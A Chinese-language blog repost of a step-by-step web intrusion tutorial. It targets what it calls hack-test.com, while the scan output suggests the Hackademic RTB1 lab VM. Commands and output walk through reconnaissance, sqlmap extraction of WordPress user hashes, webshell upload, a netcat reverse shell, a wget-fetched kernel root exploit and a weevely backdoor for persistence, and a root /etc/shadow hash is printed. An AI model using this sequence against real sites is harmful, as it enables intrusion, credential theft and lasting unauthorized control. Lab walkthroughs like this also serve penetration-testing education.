问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!
让我们来看看目标站点:hack-test.com
先ping下站点所在服务器的IP:
现在我们有了目标站点所在服务器的IP了 — 173.236.138.113
然后我们可以找找同个IP上的其他站点(旁站:sameip.org):
Same IP 26 sites hosted on IP Address 173.236.138.113
| ID | Domain | Site Link |
| 1 | hijackthisforum.com | hijackthisforum.com |
| 2 | sportforum.net | sportforum.net |
| 3 | freeonlinesudoku.net | freeonlinesudoku.net |
| 4 | cosplayhell.com | cosplayhell.com |
| 5 | videogamenews.org | videogamenews.org |
| 6 | gametour.com | gametour.com |
| 7 | qualitypetsitting.net | qualitypetsitting.net |
| 8 | brendanichols.com | brendanichols.com |
| 9 | 8ez.com | 8ez.com |
| 10 | hack-test.com | hack-test.com |
| 11 | kisax.com | kisax.com |
| 12 | paisans.com | paisans.com |
| 13 | mghz.com | mghz.com |
| 14 | debateful.com | debateful.com |
| 15 | jazzygoodtimes.com | jazzygoodtimes.com |
| 16 | fruny.com | fruny.com |
| 17 | vbum.com | vbum.com |
| 18 | wuckie.com | wuckie.com |
| 19 | force5inc.com | force5inc.com |
| 20 | virushero.com | virushero.com |
| 21 | twincitiesbusinesspeernetwork.com | twincitiesbusinesspeernetwork.com |
| 22 | jennieko.com | jennieko.com |
| 23 | davereedy.com | davereedy.com |
| 24 | joygarrido.com | joygarrido.com |
| 25 | prismapp.com | prismapp.com |
| 26 | utiligolf.com | utiligolf.com |
总计有26个站点在[173.236.138.113]这台服务器上。为了黑掉目标站点,许多黑客会把目标站点同服的其他站点也划入攻击范围内。但是出于学习的目的,我们今天暂且将其他站点放在一边。
我们需要更多关于目标站点的信息(Ps:笔者认为在渗透测试过程中,这比实施测试的环节来得重要得多。),他们包括:
1.DNS记录(A,NS,TXT,MX)
2.WEB服务类型(IIS,APACHE,TOMCAT)
3.域名注册者的信息(所持有域名公司等)
4.目标站点管理员(相关人员)的姓名,电话,邮箱和住址等
5.目标站点所支持的脚本类型(PHP,ASP,JSP,ASP.net,CFM)
6.目标站点的操作系统(UNIX,LINUX,WINDOWS,SOLARIS)
7.目标站点开放的端口
让我们先来查询相关DNS记录吧,这里用的是 who.is:
目标站点DNS记录信息:
| Record | Type | TTL | Priority | Content |
| hack-test.com | A | 4 hours | 173.236.138.113 () | |
| hack-test.com | SOA | 4 hours | ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400 | |
| hack-test.com | NS | 4 hours | ns1.dreamhost.com | |
| hack-test.com | NS | 4 hours | ns3.dreamhost.com | |
| hack-test.com | NS | 4 hours | ns2.dreamhost.com | |
| www.hack-test.com | A | 4 hours | 173.236.138.113 () |
同时确认WEB服务的类型:
显而易见是Apache ,稍后我们将确定其版本:
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
现在是时候来查询目标站点持有人(也许可能就是管理员)信息了:
现在我们有了管理员的一些相关信息了,祭出Backtrack5中的神器 Whatweb 来确认操作系统和WEB服务版本信息:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
现在我们知道,目标站点使用了用PHP编写的非常出名的开源博客系统WordPress,并且是跑在Fedora的Linux发行版上的,Apache版本是2.2.15。接下来让我们看看目标站点服务器开了哪些端口:
祭出神器Nmap
1 – 获取目标服务器开放的服务
root@bt:/# nmap -sV hack-test.com Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET Nmap scan report for hack-test.com (192.168.1.2) Host is up (0.0013s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.15 ((Fedora)) MAC Address: 00:0C:29:01:8A:4D (VMware) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – 获取目标服务器操作系统
root@bt:/# nmap -O hack-test.com Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET Nmap scan report for hack-test.com (192.168.1.2) Host is up (0.00079s latency). Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http MAC Address: 00:0C:29:01:8A:4D (VMware) Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.22 (Fedora Core 6) Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
啊哦!~只开了80,而且是 Fedora Core 6 Linux内核版本为2.6.22
现在我们已经收集了很多关于目标站点的重要信息了。让我们扫扫他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.)
让我们先试试 Nakto.pl 来扫扫,没准能搞出点漏洞来
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————
同时试试Wa3f(Ps:哦哇谱死的开源项目,很不错的说~)
root@bt:/pentest/web/w3af# ./w3af_gui Starting w3af, running on: Python version: 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) [GCC 4.4.3] GTK version: 2.20.1 PyGTK version: 2.17.0 w3af - Web Application Attack and Audit Framework Version: 1.2 Revision: 4605 Author: Andres Riancho and the w3af team.
图形界面的扫描方式,写入URL即可。
用以前给杂志社投稿的语气说,泡杯茶的功夫,等待扫描结束并查看结果。
你可以看到很多漏洞信息鸟~先试试SQL注入。
url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 然后 Exploit it!
发现其他漏洞测试失败,用SQLMap进行脱裤吧(猜解数据库并保存目标站点相关信息到本地) Dump it!
sqlmap -u url
过一小会儿能见到如下信息
按n并回车后你可以看到
哦也~显错方式的注入点,而且爆出的 Mysql的版本信息
用sqlmap取得所有库,参数 -dbs
找到三个库
查Wordpress的库中所有表,参数 -D wordpress -tables
然后是列名(这里需要你自己熟悉敏感信息存在哪个表中呢),参数 -T wp_users -columns
22个字段(列)
然后查数据,参数 -C user_login,user_pass –dump
然后解密管理员的hash,这里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php
明文密码是q1w2e3(和csdn库的密码排行榜有得一拼,哈哈~),然后登入后台拿webshell了。
Get in!~
来传个PHP的webshell吧~这里用的编辑插件拿shell的方法(见我以前写的tips,方法有很多哦~)
牛b。保存就可以了。然后访问就可以看到可爱的webshell了。
灰阔都知道,接下来要提权了。用反弹来获取一个交互式的shell。
本地用nc监听(不得不说经典就是经典啊~)
连上之后
输点Linux命令试试火候
id uid=48(apache) gid=489(apache) groups=489(apache)
pwd /var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
命令作用我就不翻译了。获取了内核版本,我们可以到 exploit-db.com 来寻找相关的exp进行权限的提升。
老外都是用wget下载的,国内灰阔们呢?
wget http://www.exploit-db.com/download/15285 -O roro.c --2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285 Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111 Connecting to www.exploit-db.com|199.27.135.111|:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http://www.exploit-db.com/download/15285/ [following] --2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/ Connecting to www.exploit-db.com|199.27.135.111|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7154 (7.0K) [application/txt] Saving to: `roro.c' 0K ...... 100% 29.7K=0.2s
代码我不贴了。用gcc编译exp gcc roro.c -o roro ,编译并且执行exp。
./roro [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved rds_proto_ops to 0xe09f0b20 [+] Resolved rds_ioctl to 0xe09db06a [+] Resolved commit_creds to 0xc044e5f1 [+] Resolved prepare_kernel_cred to 0xc044e452 [*] Overwriting function pointer... [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved rds_proto_ops to 0xe09f0b20 [+] Resolved rds_ioctl to 0xe09db06a [+] Resolved commit_creds to 0xc044e5f1 [+] Resolved prepare_kernel_cred to 0xc044e452 [*] Overwriting function pointer... [*] Triggering payload... [*] Restoring function pointer...
淡定,敲个id试试,你可以发现 root it!
现在可以查看shadow和passwd了~(我只截了部分)
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
我们可以使用 John the ripper 来破哈希。但是我们不会这么做,通常我们会留下一个后门(权限巩固),这样就可以随时涂掉他首页了(hv a joke.)。
我们用bt5中的weevely来上传一个带密码保护的PHP的webshell。
1 – weevely的相关选项
root@bt:/pentest/backdoors/web/weevely# ./main.py - Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ Usage: main.py [options] Options: -h, --help show this help message and exit -g, --generate Generate backdoor crypted code, requires -o and -p . -o OUTPUT, --output=OUTPUT Output filename for generated backdoor . -c COMMAND, --command=COMMAND Execute a single command and exit, requires -u and -p . -t, --terminal Start a terminal-like session, requires -u and -p . -C CLUSTER, --cluster=CLUSTER Start in cluster mode reading items from the give file, in the form 'label,url,password' where label is optional. -p PASSWORD, --password=PASSWORD Password of the encrypted backdoor . -u URL, --url=URL Remote backdoor URL .
2 – 用它来创建一个PHP的webshell
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko Weevely 0.3 - Generate and manage stealth PHP backdoors. Copyright (c) 2011-2012 Weevely Developers Website: http://code.google.com/p/weevely/ + Backdoor file 'hax.php' created with password 'koko'.
3 – 上传
我们现在可以用weevely连接并操控他了。
测试(其实就相当于一句话马差不多的..)
91ri.org评:老外的行文方式还不错,很好的渗透流程,很标准的科普文~~顺便补充 虽然我对文中wordperss能有sql注射表示费解 因为暂时极少听说存在sql注射(插件除外) 不过应该还是有版本存在的 这个不能说没有。毕竟人写的东西总是会有疏漏的。本文仅仅是为了给大家拓宽思路 希望大家喜欢!
2778
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
